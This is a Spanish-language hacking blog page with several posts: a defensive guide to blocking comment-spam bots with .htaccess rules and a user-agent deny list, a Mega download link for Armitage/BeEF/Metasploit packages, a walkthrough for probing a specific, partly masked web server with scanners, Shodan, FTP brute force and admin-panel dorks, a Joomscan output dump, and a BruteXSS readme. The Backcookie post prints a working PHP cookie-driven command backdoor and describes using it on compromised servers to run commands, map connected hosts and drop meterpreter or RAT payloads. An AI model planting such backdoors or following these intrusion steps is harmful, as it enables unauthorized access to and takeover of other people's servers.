HACKER ANGELWHITE GALC

lunes, 29 de agosto de 2016

Spam bots en blogs y como detenerlos

Uno de los mayores problemas en un blog se da cuando se empieza a recibir comentarios de spam que llenan nuestros artículos de mensajes no deseados: casinos, pastillas de viagra y hasta en algunos casos spyware o falsos antivirus.
Cualquiera podría pensar, que bastaría con bloquear los accesos a la página web del spammer y listo. El problema es que, usualmente, no se trata de un ataque individual, sino de una amenaza mayor, un ataque distribuido.















Este tipo de ataques, las llamadas redes de bots están formadas por cientos, miles (o más) de ordenadores que pertenecen a personas individuales e independientes, infectadas (sin ser conscientes de su infección ni de las consecuencias) por malware o troyanos que convierten su ordenador en un zombie manipulable.
Bloquear miles de accesos de diferente naturaleza (pais, navegador, proveedor...) se convierte en una tarea muy complicada y aunque existen varios sistemas para bloquear y filtrar estos ataques, voy a proponer un método distinto por varios motivos que afectan a la mayoría de sistemas:
  • Producen un consumo alto de recursos del servidor.
  • Producen falsos positivos (comentarios legítimos como spam).
  • Dependen de servicios de terceros.
  • En algunos casos es necesaria la moderación.
  • No actuan sobre el foco original del problema.
Es por ello, que he realizado un pequeño estudio para crear el siguiente informe con varias recomendaciones para construir un sistema que bloquee accesos de spammers. Trabajaremos sobre el fichero .htaccess de nuestro Apache, donde iremos bloqueando según la naturaleza de los spam bots.




NOTA: Como se verá posteriormente, en lugar de bloquear la petición haré una redirección a una carpeta llamada malware con la variable GET ident seteada a una determinada cadena. En esa ruta existirá un script que registrará ciertos datos de los accesos (ip, host, pais, referer, petición, agente de usuario...) para mantener unas estadísticas de los spambots bloqueados, su naturaleza y descubrir nuevos patrones, para luego mostrar un error 404 y simular que no existe:

en la consola escribimos lo siguiente:

if (isset($_GET['ident'])) {
$log = fopen($_SERVER['DOCUMENT_ROOT'] . "/malware/spam.log", 'a+');
$msg = $_GET['ident'] . ' ' . date('Y-m-d H:i:s') . ' ' . $_SERVER['REMOTE_ADDR'] . ' ' . $_SERVER['HTTP_USER_AGENT'] . "\n";
fwrite($log, $msg);
fclose($log);
}
header("HTTP/1.0 404 Not Found");
exit(0);

 Si tu intención es sólo bloquearlos, y no te preocupan otras cosas como el registro de accesos, reemplaza la línea RewriteRule de los siguientes códigos por la siguiente:


Esto, hará que los bloquee con un código HTTP 403.

EDITADO: Como bien apunta ajmacias en los comentarios, dentro de la carpeta malware hay que desactivar las redirecciones para evitar dejar el Apache en un bucle infinito. Para ello en el fichero .htaccess de la carpeta malware escribimos:

RewriteEngine off

 Si no sabes de que estoy hablando, te recomiendo echar un vistazo a la chuleta Emezeta ModRewrite Card.

La misteriosa flecha

Probablemente se trate de un spambot mal configurado, pero lo cierto es que varias redes de botnets tienen las peticiones de sus spambots de modo que se les «escapa» un patrón poco común en peticiones HTTP.

 210.126.72.42 - - [19/Sep/2008:04:53:10 -0700] "GET /tag/consumo%2Bcpu/ GET http://www.emezeta.com/tag/consumo%2Bcpu/ [0,30618,48635] -> HTTP/1.0" 301 263 "http://www.emezeta.com/tag/consumo%2Bcpu/ GET http://www.emezeta.com/tag/consumo%2Bcpu/ [0,30618,48635] ->" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"

 Lo aprovecharemos para bloquearlo, introduciendo en el fichero .htaccess lo siguiente:

 RewriteCond %{SERVER_PROTOCOL} " -> " [OR]
RewriteCond %{REQUEST_METHOD} " -> " [OR]
RewriteCond %{HTTP_REFERER} " -> "
RewriteRule .* /malware/?ident=arrow-spam



La IP oculta

Algunos bots se aprovechan de ciertos trucos para evitar ser identificados. Uno de ellos es aprovechar servidores Apache con HostnameLookups activado (resolver las DNS inversa / hostname) de la IP del usuario.
Esa información suele ser una cadena que da información acerca del ISP, IP enmascarada u otros datos. No todos los usuarios deben tener DNS inverso, es más, los spammers acostumbran no tenerlo para hacer más dificil su identificación.
En este caso, el spammer camufla la IP en un DNS inverso que es un único punto (.) buscando la confusión y que no se registre la IP en los logs, ni se tenga forma de resolverla.

 RewriteCond %{REMOTE_HOST} ^\.$
RewriteRule .* /malware/?ident=dot-spam 



El spammer no canónico

Este es bastante ingenioso. En múltitud de casos, lo ideal es tener nuestra página web bajo una URL canónica, o lo que es lo mismo, que sólo podamos acceder a una dirección unívoca.
Un ejemplo sería que al entrar en www.emezeta.com y a emezeta.com sólo una de las dos direcciones prevalezca. Con el siguiente código se puede conseguir (prevalece con www):

RewriteCond %{SERVER_NAME} ^sitioweb.com$ [NC]
RewriteRule ^(.*)$ http://www.sitioweb.com/$1 [R=301]



 Muchos spammers se «inventan» que vienen (referer) del sitio web al que están atacando, para que el servidor crea que es un usuario legítimo. Claro que, si tenemos esta característica canónica, parece que casi todos los spammers se olvidan de incluir el «www». Por lo tanto, si un usuario viene de otra página debe tener www, en caso contrario (no se puede dar), es un spammer.

RewriteCond %{HTTP_REFERER} "^http://sitioweb.com/" [NC]
RewriteRule .* /malware/?ident=canonical-spam



El falso agente

Un descuido común en varias redes de botnets es el especificar la previa cadena User-Agent: como agente de usuario. Probablemente se trate de un error de programación en ciertos bots, pero sin duda, podemos utilizarlo para detectar spam bots.

 RewriteCond %{HTTP_USER_AGENT} "^User-(A|a)gent: "
RewriteRule .* /malware/?ident=fakeuser-spam



Agentes malignos

Uno de los filtros más sencillos pero, sorprendentemente, de los más potentes y efectivos es el bloquear accesos simplemente por su Agente de Usuario (User Agent). Pero ojo, hay que ser muy selectivo y sólo bloquear a los agentes que se esté completamente seguro de que son spam bots.
Por ejemplo, lwp-request (comando de UNIX), WWW-Mechanize o libwww-perl (módulos para Perl) y Jakarta Commons-HttpClient (extensión Jakarta) son algunos de los sistemas que, aunque no fueron concebidos para crear este tipo de malware, los hacen un sistema muy sencillo (y frecuente) para crear spam bots.

 RewriteCond %{HTTP_USER_AGENT} "^(Java|lwp-request|WWW-Mechanize|libwww-perl|Attentio|ePochta_Extractor|Jakarta Commons-HttpClient)/"
RewriteRule .* /malware/?ident=badagent-spam


Sistema antispam CSS

El ya famoso sistema antispam del campo oculto por CSS ha resultado ser una auténtica y efectiva solución para el spam en blogs, que podemos combinar perfectamente para registrar los bots bloqueados por este sistema.
Para registrar estos accesos de spam bots, deberemos hacerlo desde PHP, ya que modrewrite no sirve para capturar variables GET / POST.
Esto puede plantear un problema, ya que no se puede hacer un include de un fichero PHP con variable GET por parámetro, como haciamos con ident. Sin embargo, existe una pequeña triquiñuela que podremos utilizar:

 $_GET = array();
$_GET['ident'] = 'css-antispam';
include($_SERVER['DOCUMENT_ROOT'] . '/malware/index.php');


 Como se puede ver, podemos modificar a nuestro antojo el array asociativo $_GET que conservará los cambios para la inclusión.

Resultados

Y ahora viene lo interesante. Después de menos de una semana de pruebas, los resultados son bastante tentadores, así que los muestro a continuación:

 # wc -l spam.log
2476 spam.log


 2.476 accesos de spam bloqueados.



 # cat spam.log | cut -d" " -f1 | sort | uniq -c | sort -n
49 dot-spam
250 canonical-spam
593 savecom-antispam
718 badagent-spam
866 mail-antispam


 Por las categorías anteriormente descritas. En mi caso he diferenciado varios formularios de otros (savecom para los comentarios y mail para el envío de email).

 # cat spam.log | cut -d" " -f2 | sort | uniq -c | sort -n
44 2008-09-17
377 2008-09-18
417 2008-09-22
488 2008-09-19
571 2008-09-21
579 2008-09-20



 Los accesos de spammers separandolos por días. Vemos que corre alrededor de una media de 500 peticiones de spam diarias, teniendo en cuenta que muchos de los rangos de IP que reiteraban fueron bloqueados por iptables.


 # cat spam.log | cut -d" " -f4-5 | sort | uniq -c | sort -n | tail -10
35 94.102.49.14 -
36 89.179.91.33 -
49 206.71.157.116 -
58 162.114.40.33 ldyddy1.ky.gov
59 200.63.42.136 -
63 94.102.49.34 -
64 85.12.25.66 -
76 67.212.189.146 server2.yourdomain9.com
118 65.98.62.90 muk.nameserver5.info
621 94.100.29.250 -



Aquí los accesos de spammers más frecuentes, agrupados por IP y hosts. Este apartado es bastante interesante, puesto que se puede comprobar que la mayoría de spammers tienen servidores web instalados sin configurar o con posibles vulnerabilidades. Probablemente sus dueños no saben que están infectados.
Mi intención posterior es crear un script que permita crear informes acerca de las peticiones mas frecuentes de spam y se envíen al email abuse de su ISP de forma automática. Con esto no sólo estaríamos evitando el spam en nuestro servidor, sino ayudando a reducirlo y prevenir a los «zombies».

 # cat spam.log | cut -d" " -f6 | sort | uniq -c | sort -n | tail -10
42 Spain
51 Poland
66 China
78 Russian_Federation
80 Korea,_Republic_of
87 Netherlands
88 Japan
106 Germany
556 United_States
868 -


 Finalmente, se puede añadir más información acerca de los spam bots que en el ejemplo superior. Por ejemplo, con ayuda del sistema de geolocalización para Apache puedo saber el pais de origen de los spam bots.


Articulo escrito por:  J. Román Hernández, más conocido como Manz (autor de Emezeta). Es Ingeniero-técnico informático de Gestión



jueves, 25 de agosto de 2016

ARMITAGE+Beef+METASPLOIT BONET

En el presente video vamos a enseñar a combinar el Armitage,el Beef y el Metasploit este video tutorial ha sido creado por mi amigo Rony Ballego Muños quien hizo estos tipos de ataques




observemos el vídeo hay esta todo explicado 




Para descargar los paquestes

https://mega.nz/#!8Z9VnDSR!YU2a2zOEBd8_WBkkOIfub8sI1u1L1U4HaoJiDUNDd7E
clave: HACKER



lunes, 22 de agosto de 2016

¿Como debo empezar para auditar un servidor web? - Nivel Intermedio

 Underc0de - Hacking y seguridad informática-https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDFvjYEPc7Bwvr9FctxqPAN6516XXgQ8D23QKLSXXMJm7FceFHKHyx21wBExHbSpjpcd1QN9xTK96UsOFARxkntf9J_9Cfy_tAljSD9OeBoam72aM0fxNGGR35-bk2be3S7hmUUSrs5XU/s1600/1.jpeg 

 Saludos mis hermanos de underc0de en esta oportunidad vamos a elaborar un análisis de como se analiza un servidor web en especifico, mediante diferentes métodos en las cuales nos ayudaran a encontrar vulnerabilidades criticas que puedan ser aprovechadas para explotar un servidor, ya que muchas personas se rinden en el primer escenario.

Antes que nada vamos a centrarnos en una pagina especifica, que la llamare "No tienes permitido ver links Registrarse o Loguearse" pero es No tienes permitido ver links Registrarse o Loguearse ( ya que me dio mucha flojera tapar el nombre de algunas fotos y en las indexaciones aparece el nombre del servicio web UNICA, por nada deje la IP en shoudan aclarando :p )

Lo primero que se debe tener en cuenta es lo siguiente:

- Analizar la estructura mediante un escaner de vulnerabilidades

Lo primero que hace todo mundo es utilizar un escaner de vulnerabilidades. entre ellos algunos utilizan Acunetix, Vega, ProxyStrike, BurpSuite, Zaproxy, Arachni, Nessus, Nikto, etc....

Todas las herramientas mencionadas están en el blog, le dejare el siguiente articulo donde menciono algunos pasos de como puede convertirse en un auditor de seguridad.


    Auditoria plataformas web
    Auditoria de CMS (Sistema de gestión de contenidos)
    Mapeo de web mediante DNS
    Subir shell en Wordpress , phpmyadmin y defacear en Joomla
    Anonimato
    Manteniendo nuestra puerta trasera en un servidor   - Backdoor
    Auditando nuestro servidor web en busca de webshells
    Encontrando fallos mediante Google Hacking
    Explotando servidores dedicados de developers
    Denegación de servicios


No tienes permitido ver links Registrarse o Loguearse

Lo que un usuario en windows con nivel intermedio siempre tiene como una buena opción es utilizar el escaner Acunetix, este fue el resultado que arrojo de la pagina de pepito:


entonces uno pensaría esta web es segura (Inhackeable) y si ejecuto otro escaner para a ver si me arroja mas vulnerabilidades, vamos a hacer un análisis simple con Vega que especialmente se enfoca en el análisis de vulnerabilidades.


me sale de igual manera pero con algunos fallos que se consideran mas altos, pero como todos sabemos NO todo lo que vemos es cierto, ya que un escaner puede ser mentiroso en sentido que puede mostrar falsos positivos.

Es por eso que se pueden buscar módulos o parámetros GET insertando sentencias manualmente para ver que pueden arrojar, en mi caso ejecutare un pequeño Spider que realice hace meses.


Pero una linea me pareció muy interesante la cual es: publicacion/datos2/js/


Entonces entrare a uno de esos parámetros para ver que puedo encontrar:


como vemos parece que hemos encontrado una vulnerabilidad en el servidor, que los escanners no encontraron, vamos a comprobarlo con sqlmap.


Pero sabemos que el servidor corre en un sistema GNU/Linux, lo que haremos sera hacerle un Ping para obtener la IP del servidor para realizar una búsqueda de sus puertos y servicios que corren.

 Underc0de - Hacking y seguridad informática-https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp3uzl7waEKXzexVu3m187HBUOe4E5UDpR9uqSoLFGTMNiTYYXw1BaGC6eRGTe387v-7IAsQF19Op9bzjrULAPh8O8NFOl_0DDeqOmwzL-043wYrti5diubETnFRWwAiBDgJC2PhFBZ4o/s1600/1.png

Una ves obtenida la verdadera IP de manera fácil es porque el servicio web no tiene Cloudflare, pero si desean aprender como encontrar la IP verdadera lo pueden hacer con Reverseraider que es una herramienta de código abierto que nos permitirá hacer un análisis de mapeo de redes, que en su mayoría algunos servicios solo se enfocan en proteger el dominio principal, pero no en sus sub-dominios que en su totalidad comprometen al principal.

No tienes permitido ver links Registrarse o Loguearse

Entonces lo que vamos a ejecutar es el buscador Shodan para ver que servicios corren:


Como vemos corren 12 servicios en diferentes puertos las cuales son los siguientes:

No tienes permitido ver links Registrarse o Loguearse


como vemos se puede hacer un ataque de fuerza bruta al FTP o buscar un exploit, en el servicio SMTP esta totalmente abierto sin credenciales, entre ellas también están abiertas las conexiones del Puerto de MySQL que pueden ser atacadas mediante SPARTA que es una herramienta de código abierto completa para realizar ataques a muchos de los servicios que corren en un servidor.


Entonces supongamos que un auditor novato diría no he encontrado nada, la web es 100% segura... pero algo esta mal en todo lo que vimos, la persona solamente se enfoca en el dominio principal pero no se pone a pensar si existen Sub-dominios que estén ligados al servidor, la búsqueda DNS inversa o revertir la resolución de DNS (RDN) es la determinación de un nombre de dominio que está asociado con una determinada dirección IP mediante el servicio de nombres de dominio (DNS) de Internet.

Se puede hacer una búsqueda mediante Sub-dominios manualmente mediante Bing utilizando la Dork " Domain:pepito.com "


como también pueden añadir la IP en Bing del servidor web principal:


Entonces usted podrá realizar búsquedas de parámetros utilizando google o cualquier otro buscador que indexe los servicios... y también pueden auditar de la misma manera si es que no encuentran fallos en el dominio principal o si desean encontrar mas fallas para reportarlas o lo que sea, supongamos que esa web no tiene NINGÚN FALLO pero esta alojada en su servidor de dominios de paga usted podrá hacer el mismo procedimiento elaborando un ataque dedicado a paginas que estén  en el mismo servicio para hacer ataques como symlink o rootear el servidor, un ejemplo es este video:
 pero algunos cuando ya obtienen algunos credenciales de usuario no saben encontrar paneles de administrador u otros, en estos caso pueden utilizar el siguiente DORK que les ayudara mucho, pero de igual manera auditar módulos en busca de ellos:

No tienes permitido ver links Registrarse o Loguearse 


como vemos yo declare en el buscador que solamente quiero buscar la palabra "Login" en el dominio pepito, pueden jugar con ello y variar las palabras como "admin", "usuario", "contraseña, etc.


Espero les haya gustado y brindado una ayuda especial para los que recién se inician en este ambiente es no confiar en su Escaner, auditen encontrando módulos y jueguen con los parámetros que para un auditor eso es diversión en el momento y trabajo adecuado.

nuevamente repito, el servidor es No tienes permitido ver links Registrarse o Loguearse, me dio mucha flojera editar y editar las imágenes para evitar burlas de los amigos que solo se dedican a criticar xD
 
 
 

Joomscan, analizando Joomla!

El uso de los CMS para la creación de páginas webs es algo que está a la orden del día.
Ya hace años que este tipo de gestores de contenido se están actualizando ofreciendo a los usuarios cada vez mas funcionalidades.
hola
El usuario que instala este tipo de gestores no ha de tener ni idea de informática, ya se han encargado de hacerlo muy sencillo para que se pueda instalar.
El uso masivo de este tipo de plataformas en usuarios sin los conocimientos necesarios y sin una concienciación en seguridad, hace que los ciber-criminales tengan com objetivo este tipo de plataforma.
Es por eso que han surgido herramientas que nos harán la tarea de analizar estos CMS en busca de vulnerabilidades.
En el artículo de hoy usaremos joomscan, una herramienta de Owasp para el análisis de CMS del tipo Joomla.
Primero accedemos al sitio web de la herramienta => https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project
Nos la bajamos y empezamos a usarla.
Para ejecutarla es sencillo
perl joomscan.pl -u WEB
Con eso Joomscan hará el resto, vamos a ver el output de un escaneo realizado.
darkmac:trunk marc$ perl joomscan.pl -u WEB
..|”|| ‘|| ‘||’ ‘|’ | .|”’.| ‘||”|.
.|’ || ‘|. ‘|. .’ ||| ||.. ‘ || ||
|| || || || | | || ”|||. ||…|’
‘|. || ||| ||| .””|. . ‘|| ||
”|…|’ | | .|. .||. |’….|’ .||.
=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================
Vulnerability Entries: 673
Last update: October 22, 2012
Target:
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
## Checking if the target has deployed an Anti-Scanner measure
[!] Scanning Passed ….. OK
## Detecting Joomla! based Firewall …
[!] No known firewall detected!
## Fingerprinting in progress …
~Generic version family ……. [1.5.x]
~1.5.x en-GB.ini revealed [1.5.12 – 1.5.14]
* Deduced version range is : [1.5.12 – 1.5.14]
## Fingerprinting done.
## 4 Components Found in front page ##
com_joomap com_profesores
com_eventlist com_content
Vulnerabilities Discovered
==========================
# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes
# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A
# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? No
# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No
# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No
# 6
Info -> Core: Missing JEXEC Check – Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No
Nos ha echo mediante fuerza bruta la comprobación de los plugins instalados.
Este script también es capaz de identificar medidas de protección que tengamos activadas:
## Checking if the target has deployed an Anti-Scanner measure
[!] Scanning Passed ….. OK
## Detecting Joomla! based Firewall …
[!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
[!] The vulnerability probing may be logged and protected.
[!] A Joomla! J-Firewall (com_jfw) is detected.
[!] The vulnerability probing may be logged and protected.
[!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
[!] The vulnerability probing may be logged and protected.
[!] A SecureLive Joomla! firewall is detected.
[!] The vulnerability probing may be logged and protected.
[!] FWScript(from firewallscript.com) is likely to be used.
[!] The vulnerability probing may be logged and protected.
[!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
[!] It is likely that webmaster routinely checks insecurities.
[!] A security scanner (com_securityscanner/com_securityscan) is detected.
[!] A Joomla! jSecure Authentication is detected.
[!] You need additional secret key to access /administrator directory
[!] Default is jSecure like /administrator/?jSecure 😉
[!] A Joomla! GuardXT Security Component is detected.
[!] It is likely that webmaster routinely checks for insecurities.
[!] A Joomla! JoomSuite Defender is detected.
[!] The vulnerability probing may be logged and protected.
Joomscan puede complementar nuestras pruebas manuales en una auditoría web y también otras apliaciones como w3af o similares, sin duda a tener en cuenta.

Backcookie la herramienta de conexión remota


Bienvenido(a), Visitante. Por favor, ingresa o regístrate. ¿Perdiste tu email de activación?
  • Agosto 23, 2016, 12:02:53 am



Autor Tema: Backcookie la herramienta de conexión remota  (Leído 1263 veces)


Desconectado BrowserNet

  • Underc0deano
  • *
  • Mensajes: 49
  • Actividad:
    1.67%
  • Agradecimientos 0
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet

  • Total Badges: 7
    Badges: (View All)
    Nivel 2Nivel 110 PostsPrimer PostFirma

Backcookie la herramienta de conexión remota

« en: Mayo 28, 2016, 02:22:24 pm »
 Underc0de - Hacking y seguridad informática-https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirh2uQgicn_Tg_DZuiuPVOkaR8l9U0PSphWwCiRYNjG6nyF25Y3oSZd7vjKmewjgM6pfXCM8chOIWDIMHgMeJ8dVVvT5QYIyZ72pyNM4tLPwm4txvxO-YGcbu3FgZ0rxw3yo_rknTRIo4/s1600/Captura+de+pantalla+de+2015-10-04+13%255E%252504%255E%252546.png

Saludos nuevamente hermanos de underc0de en esta oportunidad vamos a modernizarnos para dejar atrás las webshells, que en su mayoría ya están quemadas por algunos antivirus y firewalls que puede tener un servidor web,dando  entrada a Backcookie  una herramienta escrita en python la cual tiene como función tener conexiones entrantes de servidores web mediante cookies, vayamos a la acción

Backdoors detectable.



¿Que es una Cookie? 
Las cookies son un mecanismo por el que se almacenan datos en el navegador remoto para monitorizar o identificar a los usuarios que vuelvan al sito web.

referencia: No tienes permitido ver links Registrarse o Loguearse

Lo que haremos sera descargar la herramienta Backcokkie, luego de ello pasaremos a extraerlo

Código: No tienes permitido ver links Registrarse o Loguearse
root@kali:~# wget https://github.com/jofpin/backcookie/archive/master.zip 
Antes de comenzar deseo mandar un saludo  para un buen hermano mio, "Fraph Core" que el día de hoy esta cumpliendo un año mas de vida, por este motivo realizo este post, ya que la herramienta es creada por el y es la forma mas oportuna de hacerlo.
Feliz cumpleaños hermano!!

Iniciando la herramienta




Antes que nada podemos observar como funciona la herramienta, de acuerdo al autor funciona de dos maneras :

Código: No tienes permitido ver links Registrarse o Loguearse
    Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
    Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie
Métodos de subir el código de conexión 
Source:


<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>


El primer método en un servidor VPS
sera crear un archivo .php añadiendo el codigo y subirlo al servidor web.



El segundo método
seria añadir el código en archivo del servidor web, mediante una webshell.



Estos métodos serian los que podan utilizar ustedes,mas abajo les tengo una sorpresa cual método yo  me ingenie para hacerlo aun mas confidencial.

entonces una ves añadido nuestro código, pasaremos ejecutarlo:





Como podemos observar el dominio comprometido es un servidor privado (VPS), la cual tenemos acceso al sistema del servidor, la cual podemos subir nuestros payload de meterpreter,archivos RAT,o los que ustedes deseen, en mi caso les enseñare a utilizar esta herramienta de manera estándar, en este servidor VPS en Windows como prueba de concepto.

Lo que haremos sera ejecutar el comando CMD



como vemos hemos tenido acceso a la interprete de comandos de windows, lo que podemos hacer ahora es ejecutar los comandos que utilizamos siempre, en mi caso haré un mapeo de todas las IP'S conectadas al servidor, en este caso todos los demás servicios privados.



como podemos observar nos arroja las IP'S conectadas la cual podemos aprovecharlas para auditarlas y explotarlas mediante metasploit, o subir un archivo RAT y capturar todos los datos del servidor, por mi parte no lo haré, por motivos de ética, de igual manera podemos ver el tipo de servicio del router como veremos aquí:



Paremos a entrar a otro servidor web, en este caso el siguiente:



Como vemos es un servidor en Linux la cual, podemos interactuar con ella, sin mas que decir doy como culminado este POST, espero les aya gustado demasiado la herramienta Backcookie, ya que llevo casi un año utilizando esta gran herramienta y lo hago publico porque eh visto que hay "Personas" que han modificado el nombre del autor y han estado ripiandola :/





BruteXSS - Cross-Site Scripting Bruteforcer


BruteXSS - Cross-Site Scripting BruteForcer
Author: Shawar Khan
The BruteXSS project is sponsored and supported by Netsparker Web Application Security Scanner
Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.

Compatibility:
  • Windows , Linux or any device running python 2.7
 Requirements:

  • Python 2.7
  • Wordlist included(wordlist.txt)
  • Modules required: Colorama, Mechanize

Modules Required:

Description:
BruteXSS is a very powerful and fast Cross-Site Scripting Brutforcer which is used for bruteforcing a parameters. The BruteXSS injects multiple payloads loaded from a specified wordlist and fires them at the specified parameters and scans if any of the parameter is vulnerable to XSS vulnerability. BruteXSS is very accurate at doing its task and there is no chance of false positive as the scanning is much powerful. BruteXSS supports POST and GET requests which makes it compatible with the modern web applications.

Features:
  • XSS Bruteforcing
  • XSS Scanning
  • Supports GET/POST requests
  • Custom wordlist can be included
  • User-friendly UI 
 Usage(GET Method):

COMMAND:  python brutexss.py
METHOD:   g
URL:      http://www.site.com/?parameter=value
WORDLIST: wordlist.txt

Usage(POST method):
COMMAND:   python brutexss.py
METHOD:    p
URL:       http://www.site.com/file.php
POST DATA: parameter=value&parameter1=value1
WORDLIST:  wordlist.txt

 Output: